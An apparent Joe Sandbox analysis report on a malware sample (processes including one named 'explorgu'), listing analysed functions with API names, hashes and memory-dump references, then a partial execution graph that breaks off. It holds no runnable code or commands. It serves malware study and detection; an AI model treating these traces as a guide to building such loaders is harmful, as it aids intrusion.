                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                              • String ID: 0tO
                                                                                              • API String ID: 4078500453-1981471857
                                                                                              • Opcode ID: c0abcc6fa6f0abef5b1bba791ef5a84a01e3a2f7aafc4fe2a02209725e9f7aaa
                                                                                              • Instruction ID: 284f5ae9e28b4f4d8e44d7fa120cf80a73abfd75e6457e03c8e760eb967de132
                                                                                              • Opcode Fuzzy Hash: c0abcc6fa6f0abef5b1bba791ef5a84a01e3a2f7aafc4fe2a02209725e9f7aaa
                                                                                              • Instruction Fuzzy Hash: EE3107B1904308ABD720DF68D941A6BBBE8EF04344F000A3FEA45C7241E77DEA54C7A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004F9370 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 004F93AF
                                                                                              • __Cnd_destroy_in_situ.LIBCPMT ref: 004F93BB
                                                                                              • __Mtx_destroy_in_situ.LIBCPMT ref: 004F93C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                              • String ID: 0tO
                                                                                              • API String ID: 4078500453-1981471857
                                                                                              • Opcode ID: 71e43518d94a106f64e9b1abb31c22865e643aa42212702118b5492bc85c2c72
                                                                                              • Instruction ID: 4613f5761d9e534b03c83d86b553a4b2b0d6213f0ef1a7bb539cdd07007c9ccc
                                                                                              • Opcode Fuzzy Hash: 71e43518d94a106f64e9b1abb31c22865e643aa42212702118b5492bc85c2c72
                                                                                              • Instruction Fuzzy Hash: 59F04FB29007049BCB24DF61E449BAB73E9EF45304F04091EEA96C7A50D778FA58CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0051C2B1 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 3213747228-0
                                                                                              • Opcode ID: 87715cafdd8522531ad897488b89d31b00a75e0fc46885880f9f21484fe69394
                                                                                              • Instruction ID: 804671077eccd55c6c2ca868a9325b42dc93f2e4b75946d8af925e3017b4d0db
                                                                                              • Opcode Fuzzy Hash: 87715cafdd8522531ad897488b89d31b00a75e0fc46885880f9f21484fe69394
                                                                                              • Instruction Fuzzy Hash: 8EB178329442568FFB11CF28C8917FEBFE6FF59300F15856AD8559B242D2369D81CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004FB4D2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                              • String ID:
                                                                                              • API String ID: 531285432-0
                                                                                              • Opcode ID: e30c7d72d6ba25e1cb8aec089187a32bd90c510135f5866931135a8de23ee413
                                                                                              • Instruction ID: 21104ba11159eb3420340962453e82845d968ce9636b5016a4a7b85f31ebd213
                                                                                              • Opcode Fuzzy Hash: e30c7d72d6ba25e1cb8aec089187a32bd90c510135f5866931135a8de23ee413
                                                                                              • Instruction Fuzzy Hash: BC214F75A0021DAFDF00EFA5DD819BEBBB8EF49758F00002AF601A7251D7399D059BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004F6AB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Mtx_init_in_situ.LIBCPMT ref: 004F6CDC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Mtx_init_in_situ
                                                                                              • String ID: PuO$`-N
                                                                                              • API String ID: 3366076730-3913064466
                                                                                              • Opcode ID: f96118756bb119668c5b0c4bc8f3a27250f29b16059b8f261ef75b475dbb3ba7
                                                                                              • Instruction ID: 27a67582032fef024388689d3fa7d76e63c40affc5a5e0bb53b370af989a67a8
                                                                                              • Opcode Fuzzy Hash: f96118756bb119668c5b0c4bc8f3a27250f29b16059b8f261ef75b475dbb3ba7
                                                                                              • Instruction Fuzzy Hash: E5A138B0A017198FDB21CF68C9847AEBBF0FF48700F15815AE959AB351E7799D01CB84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004F88A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: p"N$p"N
                                                                                              • API String ID: 0-2446604238
                                                                                              • Opcode ID: 5983cfcdfda25d563e3af44ed47169507ee6651533c501828b99d8a6f8e37d15
                                                                                              • Instruction ID: dbd5222e679d0a1a77c5c04ba6b545eb5fa59dd4c2e1ee3f83e882cf3b31fbdf
                                                                                              • Opcode Fuzzy Hash: 5983cfcdfda25d563e3af44ed47169507ee6651533c501828b99d8a6f8e37d15
                                                                                              • Instruction Fuzzy Hash: DB5105B2A0011D9BCB14EF68DC419BE7BA8FF45340B10067EEA15EB341DB74EE508799
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E2360 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 004E239E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ___std_exception_copy
                                                                                              • String ID: p"N$p"N
                                                                                              • API String ID: 2659868963-2446604238
                                                                                              • Opcode ID: 37a49af66c66300ad9401f07515af1e79a0bbab41f2de466fe8ea4555a3cd09b
                                                                                              • Instruction ID: e218e477853a7153310f2cc450aa59a676c4f180e5677421ba369ceff2ef9594
                                                                                              • Opcode Fuzzy Hash: 37a49af66c66300ad9401f07515af1e79a0bbab41f2de466fe8ea4555a3cd09b
                                                                                              • Instruction Fuzzy Hash: 22F0E5B5D1031C67CB14EFE8E846886BBECEE11300B508976F654EB500F7B0F64887A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E2440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 004E2472
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ___std_exception_copy
                                                                                              • String ID: p"N$p"N
                                                                                              • API String ID: 2659868963-2446604238
                                                                                              • Opcode ID: ff11f2824e16bb4fd383bbeb2a9a93b7adbafdba3b597fd6a16ff41573a32178
                                                                                              • Instruction ID: 3255bb55c736c475d032e3a54383c18910b3f42c6d2625c47b31abb033bd8802
                                                                                              • Opcode Fuzzy Hash: ff11f2824e16bb4fd383bbeb2a9a93b7adbafdba3b597fd6a16ff41573a32178
                                                                                              • Instruction Fuzzy Hash: CFF02770D0020DEBC710DF68E8409CEBFF4EF56304F1082BEE444A7200EB706A888B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 002B7360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 002B7419
                                                                                              • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002B744C
                                                                                              • __Mtx_destroy_in_situ.LIBCPMT ref: 002B7461
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1694112022.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.1694094924.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694112022.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694170958.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694186183.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694186183.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694186183.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694186183.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694186183.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694186183.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694448435.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694562376.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694580260.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694595209.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.1694612451.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cnd_unregister_at_thread_exitConcurrency::cancel_current_taskMtx_destroy_in_situ
                                                                                              • String ID: 0t+
                                                                                              • API String ID: 400173244-1019574576
                                                                                              • Opcode ID: 246e5e5546fd01dfbfd5b6aa34297a40097a11d3110fc3823b825739b5246bf9
                                                                                              • Instruction ID: 0f0b9e78a66222c134a93e39a8bcbafa2dfbad2050f35e780c8f437796e125be
                                                                                              • Opcode Fuzzy Hash: 246e5e5546fd01dfbfd5b6aa34297a40097a11d3110fc3823b825739b5246bf9
                                                                                              • Instruction Fuzzy Hash: 3B3118B19243059FD720DF68D841B9ABBF8EF44380F100A7EE945C7641E771EA64CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:5.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:3.5%
                                                                                              Total number of Nodes:256
                                                                                              Total number of Limit Nodes:17
                                                                                              execution_graph 10854 2d5f89 10857 2d5e27 10854->10857 10858 2d5e35 __cftof 10857->10858 10859 2d5e80 10858->10859 10862 2d5e8b 10858->10862 10867 2d9b02 GetPEB 10862->10867 10864 2d5e95 10865 2d5e9a GetPEB 10864->10865 10866 2d5eaa __cftof 10864->10866 10865->10866 10868 2d9b1c __cftof 10867->10868 10868->10864 10553 2a6260 10554 2a6295 shared_ptr 10553->10554 10558 2a638f shared_ptr 10554->10558 10559 2bca76 10554->10559 10556 2a641d 10556->10558 10563 2bca2c 10556->10563 10560 2bca87 10559->10560 10561 2bca8f 10560->10561 10567 2bcafe 10560->10567 10561->10556 10564 2bca3c 10563->10564 10565 2bcae4 10564->10565 10566 2bcae0 RtlWakeAllConditionVariable 10564->10566 10565->10558 10566->10558 10568 2bcb0c SleepConditionVariableCS 10567->10568 10570 2bcb25 10567->10570 10568->10570 10570->10560 10571 2b6540 10572 2b657d 10571->10572 10575 2b6150 10572->10575 10576 2b6192 10575->10576 10579 2a7310 10576->10579 10578 2b61ad 10581 2a7365 shared_ptr 10579->10581 10580 2a74d0 shared_ptr 10580->10578 10581->10580 10587 2d6056 10581->10587 10584 2a7536 10584->10578 10586 2a7530 10586->10578 10594 2d5f9f 10587->10594 10589 2a7523 10589->10584 10590 2d60e4 10589->10590 10591 2d60f0 10590->10591 10593 2d60fa __cftof __dosmaperr 10591->10593 10610 2d606d 10591->10610 10593->10586 10595 2d5fab 10594->10595 10597 2d5fb2 __cftof __dosmaperr 10595->10597 10598 2d9b33 10595->10598 10597->10589 10599 2d9b3f 10598->10599 10602 2d9bd7 10599->10602 10601 2d9b5a 10601->10597 10605 2d9bfa 10602->10605 10604 2d9c40 ___free_lconv_mon 10604->10601 10605->10604 10606 2dcff0 10605->10606 10609 2dcffd __cftof 10606->10609 10607 2dd028 RtlAllocateHeap 10608 2dd03b __dosmaperr 10607->10608 10607->10609 10608->10604 10609->10607 10609->10608 10611 2d608f 10610->10611 10613 2d607a __cftof __dosmaperr ___free_lconv_mon 10610->10613 10611->10613 10614 2d9833 10611->10614 10613->10593 10615 2d9870 10614->10615 10616 2d984b 10614->10616 10615->10613 10616->10615 10618 2dfbf9 10616->10618 10620 2dfc05 10618->10620 10619 2dfc0d __cftof __dosmaperr 10619->10615 10620->10619 10622 2dfceb 10620->10622 10623 2dfd0d 10622->10623 10625 2dfd11 __cftof __dosmaperr 10622->10625 10623->10625 10626 2df480 10623->10626 10625->10619 10627 2df4cd 10626->10627 10633 2d6237 10627->10633 10629 2df4dc __cftof 10630 2df77c 10629->10630 10632 2dbdeb GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 10629->10632 10639 2dcbea 10629->10639 10630->10625 10632->10629 10634 2d6257 10633->10634 10638 2d624e 10633->10638 10634->10638 10643 2dadbc 10634->10643 10638->10629 10640 2dcbf5 10639->10640 10641 2dadbc __cftof 4 API calls 10640->10641 10642 2dcc05 10641->10642 10642->10629 10644 2dadcf 10643->10644 10646 2d628d 10643->10646 10645 2ded6c __cftof GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 10644->10645 10644->10646 10645->10646 10647 2dade9 10646->10647 10648 2dadfc 10647->10648 10649 2dae11 10647->10649 10648->10649 10650 2dde72 __cftof GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 10648->10650 10649->10638 10650->10649 10651 2b64b0 10652 2b64e0 10651->10652 10655 2b2ee0 10652->10655 10654 2b652c Sleep 10654->10652 10662 2b2f1c 10655->10662 10674 2b358b shared_ptr std::_Xinvalid_argument 10655->10674 10656 2b3674 shared_ptr 10656->10654 10658 2b3722 shared_ptr 10660 2b51c6 10658->10660 10689 2a6b70 10658->10689 10661 2b377f 10704 2a7110 10661->10704 10664 2a7310 5 API calls 10662->10664 10662->10674 10665 2b2fb4 10664->10665 10666 2a7310 5 API calls 10665->10666 10668 2b3223 10665->10668 10673 2b2ffb shared_ptr __dosmaperr 10666->10673 10667 2b3798 10708 2a52e0 10667->10708 10670 2a7310 5 API calls 10668->10670 10668->10674 10671 2b32c8 10670->10671 10672 2a7310 5 API calls 10671->10672 10671->10674 10676 2b330f shared_ptr 10672->10676 10673->10668 10673->10674 10714 2d8376 10673->10714 10674->10656 10679 2a55b0 10674->10679 10676->10674 10718 2b2ab0 10676->10718 10678 2b3815 shared_ptr 10678->10654 10688 4e90b55 10679->10688 10680 2a560f LookupAccountNameA 10681 2a5662 10680->10681 10745 2a21a0 10681->10745 10683 2a5699 shared_ptr 10684 